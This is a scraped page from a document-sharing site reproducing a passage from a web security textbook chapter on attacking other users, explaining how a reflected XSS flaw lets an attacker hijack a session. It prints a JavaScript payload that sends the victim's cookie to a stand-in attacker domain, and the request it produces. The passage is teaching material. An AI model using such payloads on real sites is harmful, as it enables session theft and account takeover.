The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws


Chapter 12  ■ Attacking Other Users



Download 5,76 Mb.
Pdf ko'rish
bet652/875
Sana01.01.2022
Hajmi5,76 Mb.
#293004
1   ...   648   649   650   651   652   653   654   655   ...   875
Bog'liq
3794 1008 4334

Chapter 12 



Attacking Other Users



379

70779c12.qxd:WileyRed  9/14/07  3:14 PM  Page 379




1. The user logs in to the application as normal, and is issued with a

cookie containing a session token:

Set-Cookie: sessId=184a9138ed37374201a4c9672362f12459c2a652491a3

2. Through some means (described in detail later), the attacker feeds the

following URL to the user:

https://wahhapp.com/error.php?message=

As in the previous example, which generated a dialog message, this

URL contains embedded JavaScript. However, the attack payload in

this case is more malicious.

3. The user requests from the application the URL fed to them by the

attacker.

4. The server responds to the user’s request. As a result of the XSS vulner-

ability, the response contains the JavaScript created by the attacker.

5. The attacker’s JavaScript is received by the user’s browser, which 

executes it in the same way it does any other code received from the

application.

6. The malicious JavaScript created by the attacker is:

var i=new Image; i.src=”http://wahh-attacker.com/“+document.cookie;

This code causes the user’s browser to make a request to 

wahh-

attacker.com



, which is a domain owned by the attacker. The request

contains the user’s current session token for the application:

GET /sessId=184a9138ed37374201a4c9672362f12459c2a652491a3 HTTP/1.1

Host: wahh-attacker.com

7. The attacker monitors requests to 

wahh-attacker.com

and receives the

user’s request. He uses the captured token to hijack the user’s session,

gaining access to that user’s personal information, and performing arbi-

trary actions “as” the user.




Download 5,76 Mb.

Do'stlaringiz bilan baham:
1   ...   648   649   650   651   652   653   654   655   ...   875




Ma'lumotlar bazasi mualliflik huquqi bilan himoyalangan ©hozir.org 2024
ma'muriyatiga murojaat qiling

kiriting | ro'yxatdan o'tish
    Bosh sahifa
юртда тантана
Боғда битган
Бугун юртда
Эшитганлар жилманглар
Эшитмадим деманглар
битган бодомлар
Yangiariq tumani
qitish marakazi
Raqamli texnologiyalar
ilishida muhokamadan
tasdiqqa tavsiya
tavsiya etilgan
iqtisodiyot kafedrasi
steiermarkischen landesregierung
asarlaringizni yuboring
o'zingizning asarlaringizni
Iltimos faqat
faqat o'zingizning
steierm rkischen
landesregierung fachabteilung
rkischen landesregierung
hamshira loyihasi
loyihasi mavsum
faolyatining oqibatlari
asosiy adabiyotlar
fakulteti ahborot
ahborot havfsizligi
havfsizligi kafedrasi
fanidan bo’yicha
fakulteti iqtisodiyot
boshqaruv fakulteti
chiqarishda boshqaruv
ishlab chiqarishda
iqtisodiyot fakultet
multiservis tarmoqlari
fanidan asosiy
Uzbek fanidan
mavzulari potok
asosidagi multiservis
'aliyyil a'ziym
billahil 'aliyyil
illaa billahil
quvvata illaa
falah' deganida
Kompyuter savodxonligi
bo’yicha mustaqil
'alal falah'
Hayya 'alal
'alas soloh
Hayya 'alas
mavsum boyicha


yuklab olish